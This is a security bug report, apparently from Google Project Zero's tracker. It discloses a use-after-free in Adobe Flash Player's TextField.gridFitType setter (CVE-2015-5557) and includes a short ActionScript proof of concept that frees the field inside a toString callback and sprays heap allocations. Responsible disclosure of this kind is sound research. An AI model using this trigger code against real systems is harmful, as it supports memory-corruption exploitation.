New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 418
Starred by 2 users
Status: Fixed
Owner:
cevans@google.com
Email to this user bounced
Closed: Aug 2015
Cc:
project-...@google.com



Sign in to add a comment
 Use-after-free in TextField.gridFitType
Project Member Reported by natashenka@google.com, Jun 1 2015 Back to list 
There is a use-after-free in the TextField gridFitType setter. A PoC is below:

var test = this.createTextField("test", 1, 0, 0, 100, 100);
var n = {toString : func, valueOf : func};
test.gridFitType = n;

function func(){
	
	test.removeTextField();
	for(var i = 0; i < 1000; i++){
		var b = new flash.display.BitmapData(1000, 1000, true, 10);
		}
	trace("here");
	return "natalie";
	
	}

A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
tftestsi.fla
1.2 MB Download
tftestsi.fla
1.2 MB Download
tftest.swf
808 KB Download
tftestthickness.swf
808 KB Download
tftest.fla
1.2 MB Download
Project Member Comment 1 by natashenka@google.com, Jun 3 2015 
PSIRT-3788
Project Member Comment 2 by natashenka@google.com, Aug 11 2015
Labels: CVE-2015-5557 Id-3788
Status: Fixed
Project Member Comment 3 by natashenka@google.com, Aug 18 2015
Labels: -Restrict-View-Commit
Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html
Sign in to add a comment